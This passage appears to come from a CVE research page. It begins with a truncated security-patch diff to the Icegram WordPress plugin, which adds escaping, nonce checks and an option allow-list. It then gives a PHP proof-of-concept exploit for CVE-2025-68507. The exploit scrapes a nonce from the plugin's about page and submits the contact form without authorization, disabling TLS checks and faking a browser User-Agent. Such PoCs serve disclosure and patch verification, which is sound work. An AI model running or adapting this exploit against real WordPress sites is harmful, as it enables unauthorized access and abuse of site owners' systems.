+                        <h4><?php esc_html_e("Optin Forms / Mailing service integration...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("You can embed any optin / subscription form to your Icegram Engage messages using 'Embed Form' button above text editor. Paste in form HTML code and let Icegram Engage clean it up! You may even use a shortcode if you are using a WP plugin from your newsletter / lead capture service.", "icegram"); ?></p>

-                        <h4><?php _e("How many messages should I show on a page?", "icegram"); ?></h4>
-                        <p><?php _e("While Icegram Engage provides you lots of different message types and ability to add multiple messages to a campaign, we discourage you to go overboard. We've observed two messages on a page work well, but YMMV!", "icegram"); ?></p>
+                        <h4><?php esc_html_e("How many messages should I show on a page?", "icegram"); ?></h4>
+                        <p><?php esc_html_e("While Icegram Engage provides you lots of different message types and ability to add multiple messages to a campaign, we discourage you to go overboard. We've observed two messages on a page work well, but YMMV!", "icegram"); ?></p>

                         <?php do_action('icegram_about_after_faq_col1'); ?>

                     </div>
                     <div class="col-2 last-feature">
-                        <h4><?php _e("Preview does not work / not refreshing...", "icegram"); ?></h4>
-                        <p><?php _e("Doing a browser refresh while previewing will not show your most recent changes. Click 'Preview' button to see a preview with your latest changes.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Preview does not work / not refreshing...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Doing a browser refresh while previewing will not show your most recent changes. Click 'Preview' button to see a preview with your latest changes.", "icegram"); ?></p>

-                        <h4><?php _e("Can I use shortcodes in a message?", "icegram"); ?></h4>
-                        <p><?php _e("Yes! Messages support shortcodes. You may need to adjust CSS so the shortcode output looks good in your message.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("Can I use shortcodes in a message?", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Yes! Messages support shortcodes. You may need to adjust CSS so the shortcode output looks good in your message.", "icegram"); ?></p>

-                        <h4><?php _e("WPML / Multilingual usage...", "icegram"); ?></h4>
-                        <p><?php _e("Go to <code>Messages</code> from Icegram Engage menu. Edit a message and translate it like any other post. Icegram Engage will show translated message where possible. Choose <code>All posts</code> under WPML Language setting - Blog Posts to display, to fall back to default language messages.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("WPML / Multilingual usage...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Go to <code>Messages</code> from Icegram Engage menu. Edit a message and translate it like any other post. Icegram Engage will show translated message where possible. Choose <code>All posts</code> under WPML Language setting - Blog Posts to display, to fall back to default language messages.", "icegram"); ?></p>

                         <?php do_action('icegram_about_after_faq_col2'); ?>

-                        <h4><?php _e("I can't find a way to do X...", "icegram"); ?></h4>
-                        <p><?php _e("Icegram Engage is actively developed. If you can't find your favorite feature (or have a suggestion) contact us. We'd love to hear from you.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("I can't find a way to do X...", "icegram"); ?></h4>
+                        <p><?php esc_html_e("Icegram Engage is actively developed. If you can't find your favorite feature (or have a suggestion) contact us. We'd love to hear from you.", "icegram"); ?></p>

-                        <h4><?php _e("I'm facing a problem and can't find a way out...", "icegram"); ?></h4>
-                        <p><a class="thickbox"  href="<?php echo admin_url() . "#TB_inline?inlineId=icegram_post_query_form&post_type=ig_campaign" ?>"><?php _e("Contact Us", "icegram"); ?></a><?php _e(", provide as much detail of the problem as you can. We will try to solve the problem ASAP.", "icegram"); ?></p>
+                        <h4><?php esc_html_e("I'm facing a problem and can't find a way out...", "icegram"); ?></h4>
+                        <p><a class="thickbox"  href="<?php echo esc_url( admin_url() . '#TB_inline?inlineId=icegram_post_query_form&post_type=ig_campaign' ); ?>"><?php esc_html_e("Contact Us", "icegram"); ?></a><?php esc_html_e(", provide as much detail of the problem as you can. We will try to solve the problem ASAP.", "icegram"); ?></p>

                     </div>
                 </div>
@@ -306,4 +323,6 @@
                 <?php do_action('icegram_about_after_faq'); ?>

             </div>
-        </div>
 No newline at end of file
+        </div>
+
+
--- a/icegram/lite/class-icegram.php
+++ b/icegram/lite/class-icegram.php
@@ -24,21 +24,21 @@
 		public static $current_page_id;

 		public function __construct() {
-			global $ig_feedback, $ig_tracker, $ig_usage_tracker;
+			global $icegram_feedback, $icegram_tracker, $ig_usage_tracker;

 			//To get trial related functions
-			require_once IG_PLUGIN_DIR.'lite/classes/class-icegram-trial-admin.php';
+			require_once ICEGRAM_PLUGIN_DIR.'lite/classes/class-icegram-trial-admin.php';

-			$this->version             = IG_PLUGIN_VERSION;
+			$this->version             = ICEGRAM_PLUGIN_VERSION;
 			$this->shortcode_instances = array();
 			$this->mode                = 'local';
 			$this->plugin_url          = untrailingslashit( plugins_url( '/', __FILE__ ) );
 			$this->plugin_path         = untrailingslashit( plugin_dir_path( __FILE__ ) );
-			$this->include_classes( IG_FEEDBACK_TRACKER_VERSION );
+			$this->include_classes( ICEGRAM_FEEDBACK_TRACKER_VERSION );
 			$this->cache_compatibility = get_option( 'icegram_cache_compatibility', 'no' );

 			if ( is_admin() ) {
-				$ig_feedback->render_deactivate_feedback();
+				$icegram_feedback->render_deactivate_feedback();
 			}

 			if ( is_admin() && current_user_can( 'edit_posts' ) ) {
@@ -63,7 +63,7 @@
 				add_action( 'wp_ajax_ig_dismiss_mailer_promotion_notice', array( $this, 'dismiss_ig_mailer_promotion_notice' ) );
 				add_action( 'wp_ajax_ig_mailer_notice_clickable', array( $this, 'mailer_notice_clickable' ) );

-				add_filter( 'plugin_action_links_' . plugin_basename( IG_PLUGIN_FILE ), array( $this, 'ig_plugin_settings_link' ), 11, 2 );
+				add_filter( 'plugin_action_links_' . plugin_basename( ICEGRAM_PLUGIN_FILE ), array( $this, 'ig_plugin_settings_link' ), 11, 2 );
 				add_filter( 'plugin_row_meta', array( $this, 'add_plugin_support_links' ), 10, 4 );
 				add_filter( 'manage_edit-ig_campaign_columns', array( $this, 'custom_ig_campaign_column' )  ,10,1);
 				add_action( 'manage_ig_campaign_posts_custom_column', array( $this, 'edit_columns' ), 2 );
@@ -72,9 +72,9 @@
 				add_action( 'admin_bar_menu', array( $this, 'ig_show_documentation_link_in_admin_bar' ), 999 );
 				add_action( 'admin_head', array( $this, 'ig_documentation_link_admin_bar_css' ), 999 );

-				add_filter( 'ig_escape_allowed_tags', array( $this, 'ig_add_escape_allowed_tags' ) );
+				add_filter( 'icegram_escape_allowed_tags', array( $this, 'ig_add_escape_allowed_tags' ) );

-				add_filter('ig_validate_custom_script',  array( &$this, 'ig_custom_script_validation' ));
+				add_filter('icegram_validate_custom_script',  array( &$this, 'ig_custom_script_validation' ));

 			} else {
 				add_action( 'wp_footer', array( &$this, 'icegram_load_data' ) );
@@ -110,21 +110,21 @@

 			if ( defined( 'DOING_AJAX' ) ) {
 				if ( $this->cache_compatibility === 'yes' ) {
-					add_action( 'wp_ajax_display_messages', array( &$this, 'display_messages' ) );
-					add_action( 'wp_ajax_nopriv_display_messages', array( &$this, 'display_messages' ) );
+					add_action( 'wp_ajax_ig_display_messages', array( &$this, 'display_messages' ) );
+					add_action( 'wp_ajax_nopriv_ig_display_messages', array( &$this, 'display_messages' ) );
 				}
 				add_action( 'wp_ajax_icegram_event_track', array( &$this, 'icegram_event_track' ) );
 				add_action( 'wp_ajax_nopriv_icegram_event_track', array( &$this, 'icegram_event_track' ) );
 				add_action( 'wp_ajax_es_list_subscribe', array( &$this, 'es_list_subscribe' ) );
 				add_action( 'wp_ajax_icegram_run_housekeeping', array( &$this, 'run_housekeeping' ) );
-				add_action( 'wp_ajax_save_gallery_data', array( &$this, 'save_gallery_data' ) );
+				add_action( 'wp_ajax_ig_save_gallery_data', array( &$this, 'save_gallery_data' ) );
 			}
 		}


 		function ig_plugin_settings_link( $links, $file ) {
 			global $icegram;
-			if ( $file == plugin_basename( IG_PLUGIN_FILE ) ) {
+			if ( $file == plugin_basename( ICEGRAM_PLUGIN_FILE ) ) {

 				$campaigns_link = '<a href="edit.php?post_type=ig_campaign">' . __( 'Campaigns', 'icegram' ) . '</a>';
 				$docs_link 		= '<a href="https://www.icegram.com/knowledgebase_category/icegram/" target="_blank">' . __( 'Docs', 'icegram' ) . '</a>';
@@ -152,7 +152,7 @@
 		 */
 		function add_plugin_support_links( $plugin_meta, $plugin_file, $plugin_data, $status ) {

-			if ( plugin_basename( IG_PLUGIN_FILE ) === $plugin_file ) {
+			if ( plugin_basename( ICEGRAM_PLUGIN_FILE ) === $plugin_file ) {
 				$plugin_meta[] = '<a href="https://wordpress.org/support/plugin/icegram/reviews/#new-post" title="' . __( 'Rate Icegram', 'icegram' ) . '" target="_blank">' . __( 'Rate Icegram', 'icegram' ) . '</a>';
 				$plugin_meta[] = '<a href="https://www.icegram.com/contact/" title="' . __( 'Support', 'icegram' ) . ' " target="_blank">' . __( 'Support', 'icegram' ) . '</a>';
 			}
@@ -183,7 +183,7 @@
 			foreach ( $compat_classes as $file ) {
 				if ( is_file( $file ) ) {
 					$slug = str_replace( 'class-icegram-compat-', '', str_replace( ".php", "", basename( $file ) ) );
-					if ( in_array( $slug, $active_plugins ) || ig_array_contains( $active_plugins, $slug ) ) {
+					if ( in_array( $slug, $active_plugins ) || icegram_array_contains( $active_plugins, $slug ) ) {
 						include_once( $file );
 						$class_name = 'Icegram_Compat_' . str_replace( '-', '_', $slug );
 						if ( class_exists( $class_name ) ) {
@@ -221,7 +221,9 @@
 				?>
 				<div id="ig_es_mailer_promotion_notice" class="notice is-dismissible" style="border-left-width:1px;">
 					<div style="display: flex;gap:0.8em;padding-top:0.5rem;padding-bottom:0.4rem;">
-						<img src="https://ps.w.org/icegram-mailer/assets/icon-128x128.png" style="height:4em;margin-top: 0.1rem;" />
+						<?php
+						echo '<img src="' . esc_url( $this->plugin_url . '/assets/images/icegram-mailer-icon-128x128.png' ) . '" style="height:4em;margin-top: 0.1rem;" alt="Icegram Mailer Icon" />';
+						?>
 						<div style="color: rgb(55 65 81);">
 							<p style="font-weight: bolder; font-size:0.8rem; margin:0; font-size:1.1em">
 								<?php echo esc_html__( 'Get 200 Free Emails Every Month!', 'icegram' ); ?>
@@ -230,13 +232,14 @@
 							<p style="margin:0; font-size:1.1em;font-weight:400;">
 								<?php echo wp_kses_post(
 										sprintf(
+											/* translators: %s is the name of the product (Icegram Mailer) */
 											__( 'Start sending with confidence. No setup needed, no SMTP headaches. Enjoy 200 emails per month absolutely free with <span style="font-weight: 700;">%s</span>.', 'icegram' ),
 											'Icegram Mailer'
 										)
 									); ?>
 								<a href="<?php echo esc_url( $optin_url ); ?>" target="_blank" id="ig_mailer_promo_button" style="margin-left:0.5rem;">
 									<button type="button" style="color: #5850ec; padding:0.25rem 0.75rem 0.25rem 0.75rem; line-height:1.25rem; font-size:0.875rem; font-weight:500; cursor:pointer; background-color: rgba(255,255,255,1); border:1px solid #d2d6dc;border-radius:0.375rem;">
-										<?php echo esc_html__( $optin_btn_txt, 'icegram'); ?>
+										<?php echo esc_html( $optin_btn_txt ); ?>
 									</button>
 								</a>
 							</p>
@@ -248,11 +251,11 @@
 						jQuery('#ig_es_mailer_promotion_notice').on('click', '.notice-dismiss, #ig-es-mailer-promo-button', function() {
 							jQuery.ajax({
 								method: 'POST',
-								url: "<?php echo admin_url( 'admin-ajax.php' ); ?>",
+								url: "<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>",
 								dataType: 'json',
 								data: {
 									action: 'ig_dismiss_mailer_promotion_notice',
-									security: '<?php echo wp_create_nonce( 'ig-dissmiss-mailer-notice' );?>',
+									security: '<?php echo esc_js( wp_create_nonce( 'ig-dissmiss-mailer-notice' ) ); ?>',
 								}
 							}).done(function(response){
 								console.log( 'response: ', response );
@@ -262,11 +265,11 @@
 						jQuery('#ig_es_mailer_promotion_notice').on('click', '#ig_mailer_promo_button', function() {
 							jQuery.ajax({
 								method: 'POST',
-								url: "<?php echo admin_url( 'admin-ajax.php' ); ?>",
+								url: "<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>",
 								dataType: 'json',
 								data: {
 									action: 'ig_mailer_notice_clickable',
-									security: '<?php echo wp_create_nonce( 'ig-mailer-notice-clickable' );?>',
+									security: '<?php echo esc_js( wp_create_nonce( 'ig-mailer-notice-clickable' ));?>',
 								}
 							}).done(function(response){
 								console.log( 'response: ', response );
@@ -315,16 +318,34 @@

 			include_once( 'ig-offer.php' );

-			//include_once IG_PLUGIN_DIR . 'lite/notices/admin-notices.php';
+			//include_once ICEGRAM_PLUGIN_DIR . 'lite/notices/admin-notices.php';

 		}

 		public function dismiss_admin_notice() {
+
+			if ( ! isset( $_GET['ig_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['ig_nonce'] ) ), 'ig_dismiss_notice' ) ) {
+				return;
+			}
+
 			if ( isset( $_GET['ig_dismiss_admin_notice'] ) && $_GET['ig_dismiss_admin_notice'] == '1' && isset( $_GET['ig_option_name'] ) ) {
-				$option_name = sanitize_text_field( $_GET['ig_option_name'] );
-				update_option( $option_name . '_icegram', 'yes', false );
+
+				$option_name = sanitize_text_field( wp_unslash( $_GET['ig_option_name'] ) );
+
+				$allowed_options = array(
+					'trial_to_premium_notice',
+					'ig_offer_bfcm_2025',
+					'ig_new_admin_ui'
+				);

+				if ( ! in_array( $option_name, $allowed_options, true ) ) {
+					return;
+				}
+
+				update_option( $option_name . '_icegram', 'yes', false );
+
 				$safe_redirect = false;
+
 				if ( in_array( $option_name, array( 'trial_to_premium_notice' ), true ) ) {
 					update_option( 'ig_' . $option_name . '_date', gmdate( 'Y-m-d H:i:s'), false );
 				}
@@ -334,12 +355,12 @@
 					header( "Location: {$url}" );
 					exit();
 				} elseif( 'ig_new_admin_ui' === $option_name ) {
-					$url = "https://www.icegram.com/wp-content/uploads/2022/06/IG-admin-UI.png";
+					$url = ICEGRAM_PLUGIN_URL . 'lite/assets/images/IG-admin-UI.png';
 					header( "Location: {$url}" );
 					exit();
 				} elseif( 'trial_to_premium_notice' === $option_name ) {

-					$action = $_GET['action'];
+					$action = isset( $_GET['action'] ) ? sanitize_text_field( wp_unslash( $_GET['action'] ) ) : '';
 					if ( 'ig_trial_to_premium_redirect' === $action ) {

 						header( 'Location: https://www.icegram.com/icegram/pricing/?utm_source=in_app&utm_medium=ig_trial_to_premium_notice&utm_campaign=ig_trial_to_premium_notice' );
@@ -386,28 +407,41 @@
 		}

 		public function es_subscribe_form() {
+			global $icegram;
 			?>
 	        <div class="wrap">
 				<?php
 				if ( stripos( get_current_screen()->base, 'settings' ) !== false ) {
-					echo "<h2>" . __( 'Free Add-ons, Proven Marketing Tricks and  Updates', 'icegram' ) . "</h2>";
+					echo "<h2>" . esc_html__( 'Free Add-ons, Proven Marketing Tricks and  Updates', 'icegram' ) . "</h2>";
 				}
 				$current_user   = wp_get_current_user();
 				$customer_email = $current_user->user_email;
 				?>
 	            <table class="form-table">
 	                <tr>
-	                    <th scope="row"><span class="text-base text-gray-500"><?php _e( 'Get add-ons and tips...', 'icegram' ) ?></span></th>
+	                    <th scope="row"><span class="text-base text-gray-500"><?php esc_html_e( 'Get add-ons and tips...', 'icegram' ) ?></span></th>
 	                    <td>
 	                    	<form name="ig_subscription_form" id="ig-subscription-form">
 								<input type="hidden"  id="sign-up-list" name="list" value="d44945bf9155"/>
 							    <input type="hidden" id="sign-up-form-source" name="form-source" value=""/>
 								<input class="ltr form-input py-1" type="text" name="name" id="ig-sign-up-name" placeholder="Name"/>
-		                        <input class="regular-text ltr form-input py-1" type="text" name="email" id="ig-sign-up-email" placeholder="Email" value="<?php echo $customer_email ?>"/>
+		                        <input class="regular-text ltr form-input py-1" type="text" name="email" id="ig-sign-up-email" placeholder="Email" value="<?php echo esc_attr( $customer_email ); ?>"/>
 		                        <input type="submit" name="submit" id="ig-sign-up-submit" class="button button-primary cursor-pointer align-middle px-4 py-0.5 -mt-1 mx-2 hover:shadow-md rounded-md font-medium bg-indigo-600 text-white" value="Subscribe">
 		                        <br><br>
 		                        <input type="checkbox" name="es-gdpr-agree" id="es-gdpr-agree" value="1" class="form-checkbox" required="required">
-		                        <label for="es-gdpr-agree"><?php echo sprintf( __( 'I have read and agreed to our %s.', 'icegram' ), '<a href="https://www.icegram.com/privacy-policy/" target="_blank">' . __( 'Privacy Policy', 'icegram' ) . '</a>' ); ?></label>
+		                        <label for="es-gdpr-agree">
+									<?php
+									$ig_allowed_tags = $icegram->ig_add_escape_allowed_tags();
+									echo wp_kses(
+										sprintf(
+											/* translators: %s is a link to the privacy policy */
+											__( 'I have read and agreed to our %s.', 'icegram' ),
+											'<a href="https://www.icegram.com/privacy-policy/" target="_blank">' . esc_html__( 'Privacy Policy', 'icegram' ) . '</a>'
+										),
+										$ig_allowed_tags
+									 );
+									?>
+								</label>
 		                        <br>
 		                        <div id="ig-subscribe-response"></div>
 							</form>
@@ -442,10 +476,10 @@
 						jQuery.ajax({
 							method: 'POST',
 							type: 'text',
-							url: "<?php echo admin_url( 'admin-ajax.php' ); ?>",
+							url: "<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>",
 							data: {
 								action: 'es_list_subscribe',
-								security: '<?php echo wp_create_nonce( 'ig-nonce' );?>',
+								security: '<?php echo esc_js( wp_create_nonce( 'ig-nonce' ) ); ?>',
 								name: name,
 								email: email,
 								list: list,
@@ -476,16 +510,16 @@
 		 * @param array $request_data
 		 */
 		public function es_list_subscribe() {
-
+
 			check_ajax_referer( 'ig-nonce', 'security' );
-
+
 			$response = array(
 				'status' => 'error',
 			);

-			$name  = ! empty( $_POST['name'] ) ? sanitize_text_field( $_POST['name'] ) : '';
-			$email = ! empty( $_POST['email'] ) ? sanitize_text_field( $_POST['email'] ) : '';
-			$list  = ! empty( $_POST['list'] ) ? sanitize_text_field( $_POST['list'] ) : '';
+			$name  = ! empty( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
+			$email = ! empty( $_POST['email'] ) ? sanitize_text_field( wp_unslash( $_POST['email'] ) ) : '';
+			$list  = ! empty( $_POST['list'] ) ? sanitize_text_field( wp_unslash( $_POST['list'] ) ) : '';

 			if ( ! empty( $list ) && is_email( $email ) ) {

@@ -548,20 +582,20 @@
 				if ( stripos( get_current_screen()->base, 'settings' ) !== false ) {
 				?>
 	            <form name="icegram_housekeeping" action="#" method="POST" accept-charset="utf-8">
-	                <h2><?php _e( 'Housekeeping', 'icegram' ) ?></h2>
+	                <h2><?php esc_html_e( 'Housekeeping', 'icegram' ) ?></h2>
 	                <p class="ig_housekeeping">
 	                    <label for="icegram_remove_shortcodes">
 	                        <input type="checkbox" name="icegram_remove_shortcodes" value="yes"/>
-							<?php _e( 'Remove all Icegram Engage shortcodes', 'icegram' ); ?>
+							<?php esc_html_e( 'Remove all Icegram Engage shortcodes', 'icegram' ); ?>
 	                    </label>
 	                    <br/><br/>
 	                    <label for="icegram_remove_all_data">
 	                        <input type="checkbox" name="icegram_remove_all_data" value="yes"/>
-							<?php _e( 'Remove all Icegram Engage campaigns and messages', 'icegram' ); ?>
+							<?php esc_html_e( 'Remove all Icegram Engage campaigns and messages', 'icegram' ); ?>
 	                    </label>
 	                    <br/><br/>
-	                    <img alt="" src="<?php echo admin_url( 'images/wpspin_light.gif' ) ?>" class="ig_loader" style="vertical-align:middle;display:none"/>
-	                    <input type="submit" name="submit" id="submit" class="button button-primary" value="<?php _e( 'Clean Up', 'icegram' ); ?>">
+	                    <img alt="" src="<?php echo esc_url( admin_url( 'images/wpspin_light.gif' ) ); ?>" class="ig_loader" style="vertical-align:middle;display:none"/>
+	                    <input type="submit" name="submit" id="submit" class="button button-primary" value="<?php esc_html_e( 'Clean Up', 'icegram' ); ?>">
 	                <div id="icegram_housekeeping_response"></div>
 	                </p>
 	            </form>
@@ -570,22 +604,22 @@
 	        <script type="text/javascript">
 				jQuery(function () {
 					jQuery("form[name=icegram_housekeeping]").submit(function (e) {
-						if (confirm("<?php _e( 'You won't be able to recover this data once you proceed. Do you really want to perform this action?', 'icegram' ); ?>") == true) {
+						if (confirm("<?php echo esc_js( __( 'You won't be able to recover this data once you proceed. Do you really want to perform this action?', 'icegram' ) ); ?>") == true) {
 							e.preventDefault();
 							jQuery('.ig_loader').show();
 							jQuery('#icegram_housekeeping_response').text("");
 							params = jQuery("form[name=icegram_housekeeping]").serializeArray();
 							params.push({name: 'action', value: 'icegram_run_housekeeping'});
-							params.push({name: 'security', value: '<?php echo wp_create_nonce( 'ig_run_housekeeping' ); ?>'});
+							params.push({name: 'security', value: '<?php echo esc_js( wp_create_nonce( 'ig_run_housekeeping' ) ); ?>'});

 							jQuery.ajax({
 								method: 'POST',
 								type: 'text',
-								url: "<?php echo admin_url( 'admin-ajax.php' ); ?>",
+								url: "<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>",
 								data: params,
 								success: function (response) {
 									jQuery('.ig_loader').hide();
-									jQuery('#icegram_housekeeping_response').text("<?php _e( 'Done!', 'icegram' ); ?>");
+									jQuery('#icegram_housekeeping_response').text("<?php echo esc_js( __( 'Done!', 'icegram' ) ); ?>");
 								}
 							});
 						}
@@ -604,7 +638,10 @@
 			if ( current_user_can( 'manage_options' ) && ! empty( $params['icegram_remove_shortcodes'] ) && $params['icegram_remove_shortcodes'] == 'yes' ) {
 				// first get all posts with [icegram] shortcode in them
 				$sql   = "SELECT * FROM `$wpdb->posts` WHERE  `post_content` LIKE  '%[icegram %]%' and `post_type` != 'revision' ";
-				$posts = $wpdb->get_results( $sql, OBJECT );
+
+				// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared
+				$posts = $wpdb->get_results( $sql, OBJECT );
+
 				if ( ! empty( $posts ) && is_array( $posts ) ) {
 					foreach ( $posts as $post ) {
 						$post_content = $post->post_content;
@@ -635,15 +672,20 @@
 		}

 		public function icegram_event_track() {
+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
 			if ( ! empty( $_POST['ig_local_url_cs'] ) && isset( $_SERVER['HTTP_ORIGIN'] ) ) {
-				$parts    = parse_url( sanitize_text_field( $_POST['ig_local_url_cs'] ) );
+				// phpcs:ignore WordPress.Security.NonceVerification.Missing
+				$parts    = parse_url( sanitize_text_field( wp_unslash( $_POST['ig_local_url_cs'] ) ) );
 				$base_url = $parts["scheme"] . "://" . $parts["host"];
 				header( 'Access-Control-Allow-Origin: ' . $base_url );
 				header( 'Access-Control-Allow-Credentials: true' );
 			}

+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
 			if ( ! empty( $_POST['event_data'] ) ) {
-				foreach ( $_POST['event_data'] as $event ) {
+				// phpcs:ignore WordP

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68507 - Icegram <= 3.1.35 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2025-68507
 * Exploits missing authorization in Icegram plugin contact form
 * Requires obtaining a valid nonce first from the about page
 */

$target_url = 'http://vulnerable-wordpress-site.com';

// Step 1: Extract nonce from the Icegram about page
function get_nonce_from_about_page($base_url) {
    $about_url = $base_url . '/wp-admin/admin.php?page=icegram-about';
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $about_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Extract nonce from the contact form
    if (preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $response, $matches)) {
        return $matches[1];
    }
    
    return null;
}

// Step 2: Exploit the missing authorization to send email
function exploit_contact_form($base_url, $nonce) {
    $post_url = $base_url . '/wp-admin/admin.php?page=icegram-about';
    
    $post_data = [
        'submit_query' => 'Send',
        'client_name' => 'Atomic Edge Test',
        'client_email' => 'attacker@example.com',
        'subject' => 'Test Exploit - CVE-2025-68507',
        'message' => 'This email was sent via unauthorized access to Icegram plugin.',
        '_wpnonce' => $nonce,
        'additional_info[current_plugin]' => 'Icegram 3.1.35'
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $post_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Add headers to mimic legitimate request
    $headers = [
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ['code' => $http_code, 'response' => $response];
}

// Execute the exploit
$nonce = get_nonce_from_about_page($target_url);

if ($nonce) {
    echo "[+] Obtained nonce: $noncen";
    echo "[+] Attempting to exploit contact form...n";
    
    $result = exploit_contact_form($target_url, $nonce);
    
    if ($result['code'] == 200 || $result['code'] == 302) {
        echo "[+] Exploit successful! Email sent via unauthorized access.n";
        echo "[+] HTTP Status: " . $result['code'] . "n";
    } else {
        echo "[-] Exploit failed. HTTP Status: " . $result['code'] . "n";
    }
} else {
    echo "[-] Failed to obtain nonce from about pagen";
}

?>